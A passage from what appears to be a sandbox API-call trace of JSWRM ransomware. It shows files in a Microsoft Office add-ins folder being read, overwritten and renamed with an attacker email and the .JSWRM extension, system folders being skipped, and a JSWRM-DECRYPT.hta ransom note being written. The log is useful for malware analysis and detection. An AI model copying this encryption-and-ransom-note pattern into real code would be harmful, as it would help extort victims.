cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0123.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0123.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0123.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0123.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0123.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0123.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.575] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\OUTEX.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\outex.ecf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\OUTEX.ECF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\outex.ecf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0123.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0123.576] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xafa146a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTEX2.ECF", cAlternateFileName="")) returned 1 [0123.576] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2=".") returned 1 [0123.576] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="..") returned 1 [0123.576] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="...") returned 1 [0123.576] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="windows") returned -1 [0123.576] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="recovery") returned -1 [0123.576] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="perflogs") returned -1 [0123.577] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="documents and settings") returned 1 [0123.577] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="$RECYCLE.BIN") returned 1 [0123.577] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="system volume information") returned -1 [0123.577] lstrcmpiW (lpString1="OUTEX2.ECF", lpString2="msocache") returned 1 [0123.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0123.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTEX2.ECF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTEX2.ECF", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTEX2.ECF", lpUsedDefaultChar=0x0) returned 10 [0123.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0123.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0123.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTEX2.ECF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTEX2.ECF", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTEX2.ECF", lpUsedDefaultChar=0x0) returned 10 [0123.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0123.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0123.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0123.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0123.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\OUTEX2.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\outex2.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0123.578] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=850) returned 1 [0123.578] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x350) returned 0x20e550 [0123.578] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x350, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x350, lpOverlapped=0x0) returned 1 [0123.581] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.581] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x350, lpOverlapped=0x0) returned 1 [0123.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0123.581] CloseHandle (hObject=0x238) returned 1 [0123.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0123.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0123.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0123.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0123.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0123.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0123.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0123.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0123.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.582] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\OUTEX2.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\outex2.ecf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\OUTEX2.ECF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\outex2.ecf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0123.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0123.583] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c5a96a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc7c80c48, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLVBA.DLL", cAlternateFileName="")) returned 1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2=".") returned 1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="..") returned 1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="...") returned 1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="windows") returned -1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="recovery") returned -1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="perflogs") returned -1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="documents and settings") returned 1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="system volume information") returned -1 [0123.583] lstrcmpiW (lpString1="OUTLVBA.DLL", lpString2="msocache") returned 1 [0123.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0123.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLVBA.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0123.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLVBA.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLVBA.DLL", lpUsedDefaultChar=0x0) returned 11 [0123.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0123.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLVBA.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0123.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLVBA.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLVBA.DLL", lpUsedDefaultChar=0x0) returned 11 [0123.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0123.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0123.583] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xafa146a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x272, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PMAILEXT.ECF", cAlternateFileName="")) returned 1 [0123.583] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2=".") returned 1 [0123.583] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="..") returned 1 [0123.583] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="...") returned 1 [0123.583] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="windows") returned -1 [0123.583] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="recovery") returned -1 [0123.583] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="perflogs") returned 1 [0123.583] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="documents and settings") returned 1 [0123.583] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="$RECYCLE.BIN") returned 1 [0123.584] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="system volume information") returned -1 [0123.584] lstrcmpiW (lpString1="PMAILEXT.ECF", lpString2="msocache") returned 1 [0123.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0123.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PMAILEXT.ECF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0123.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PMAILEXT.ECF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PMAILEXT.ECF", lpUsedDefaultChar=0x0) returned 12 [0123.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0123.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0123.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PMAILEXT.ECF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0123.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PMAILEXT.ECF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PMAILEXT.ECF", lpUsedDefaultChar=0x0) returned 12 [0123.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0123.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0123.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0123.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0123.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PMAILEXT.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\pmailext.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0123.585] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=626) returned 1 [0123.585] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0123.585] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0123.586] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.586] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0123.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0123.586] CloseHandle (hObject=0x238) returned 1 [0123.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0123.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0123.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0123.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0123.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0123.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0123.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.586] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PMAILEXT.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\pmailext.ecf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PMAILEXT.ECF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\pmailext.ecf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0123.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0123.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0123.590] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf016e209, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="Power Map Excel Add-in", cAlternateFileName="POWERM~1")) returned 1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2=".") returned 1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="..") returned 1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="...") returned 1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="windows") returned -1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="recovery") returned -1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="perflogs") returned 1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="documents and settings") returned 1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="$RECYCLE.BIN") returned 1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="system volume information") returned -1 [0123.590] lstrcmpiW (lpString1="Power Map Excel Add-in", lpString2="msocache") returned 1 [0123.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0123.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0123.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0123.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0123.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0123.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0123.590] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power Map Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power map excel add-in\\jswrm-decrypt.hta")) returned 0xffffffff [0123.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0123.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0123.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0123.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0123.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power Map Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power map excel add-in\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0123.592] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.593] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0123.593] CloseHandle (hObject=0x238) returned 1 [0123.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0123.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0123.594] RtlAllocateHeap (HeapHandle=0x1e0000, 